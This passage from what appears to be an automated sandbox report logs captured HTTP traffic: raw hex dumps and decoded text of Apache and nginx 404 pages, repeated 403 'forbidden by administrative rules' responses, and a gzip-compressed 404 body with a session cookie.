3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:43:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:43:30 GMTContent-Type: text/htmlContent-Length: 589Connection: closeExpires: 0Cache-control: privateData Raw: 53 6f 72 72 79 2c 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Sorry, Page Not Found
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 26 Apr 2024 05:43:39 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 26 Apr 2024 05:43:42 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 26 Apr 2024 05:43:44 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 26 Apr 2024 05:43:47 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 26 Apr 2024 05:44:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=4sf9f9dr8163fg43an66jnm1vs; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db 38 92 ee e7 e9 73 e6 3f b0 b5 3b 3d f6 6d 8b 7a b5 64 39 56 7a dd 8e d3 f1 dd 38 f1 c4 4e f7 ce 24 59 1d 8a a2 24 26 12 a9 88 94 1d c7 9d 1f 76 3f df 3f 76 9f a7 00 90 a0 5e 6c 25 d3 7b 76 3f dc 3e 1d 99 22 80 42 a1 50 a8 2a 14 aa a0 a3 ef 9f bc 3c b9 fa fb c5 a9 33 4e a7 93 c7 df 1d f1 8f e3 4f bc 24 e9 96 a2 b8 fc 3e 29 39 b3 79 30 0c 3f 75 4b f1 e8 10 b5 d2 59 72 58 a9 c4 a3 99 3b 0d 2a 51 f2 2f 25 67 e2 45 a3 6e 29 4c 4b 6c 1e 78 83 c7 47 93 30 fa e0 cc 83 49 b7 84 b6 7e 1c 45 81 9f 96 9c 31 e0 74 4b 06 c2 a0 36 08 eb 93 cf 8b 71 a7 3d 1c d7 5d 7f 12 2f 06 c3 79 1c a5 6e 14 a0 b2 3f 8f 93 24 9e 87 a3 30 da 0e de 10 4d 13 77 94 a4 5e 1a fa ae 1f 4f 97 60 4c 83 d4 73 fc b1 37 4f 82 b4 5b 5a a4 c3 f2 41 c9 86 1c 02 cf af c2 b1 32 0c 27 41 52 a9 0f f0 7f c8 7f d7 8d b1 9b 5c 8f 7e 9a 8d bb 7e bf e1 b5 0f 82 ce 7e bb e4 a4 b7 b3 00 e4 99 7a a3 a0 82 e2 1f 3f 4d 27 25 27 09 3f 07 a0 b0 17 dd fe 21 48 54 db 95 6a 7b c8 7f 9f 3f 1e 7c 2d 12 b5 d6 a7 5a eb 0f 41 a3 f6 be 52 7b df e0 bf 76 ab ed 82 a2 4b b4 b0 e9 ed cd 66 93 a0 9c c6 0b 7f 5c fe 56 da 7f 4d 7f ff 65 7d 7c e7 e0 bf 23 61 2f f2 76 39 f8 b8 08 af bb a5 ff 28 bf 3e 2e 9f c4 d3 19 f8 b1 3f 09 c0 8d 60 d0 20 02 ef 9d 9d 76 83 c1 28 c0 72 91 96 69 98 4e 82 c7 cd 6a d3 29 3b 17 1e f8 dd 73 a2 38 72 d2 79 7c ed 81 65 0f 0f 9d a9 97 ce c3 69 1c 85 78 33 01 08 54 09 d2 78 3a f5 92 f8 a8 a2 9a 5b 48 44 de 14 fc 76 1d 06 37 b3 78 ce 95 64 fa bd 09 07 e9 b8 3b 08 ae 43 3f 28 cb 97 bd 30 0a d3 d0 9b 94 13 1f 80 bb 35 83 92 0c 46 c1 99 26 9c a8 d0 c7 28 e2 a8 9c 7a b3 f2 38 1c 8d 27 f8 67 83 8e 62 d3 54 96 fe 57 ac 74 bd 8a aa cd 4a b5 39 e3 bf f0 60 df f5 93 64 89 73 9c 69 30 08 3d ca 93 30 42 c7 22 5b 92 f4 16 0b 70 1c 40 5c 68 52 7e 63 e7 f5 f7 95 fa fb 5b fe db 1f 75 ee e9 3c f1 e7 41 10 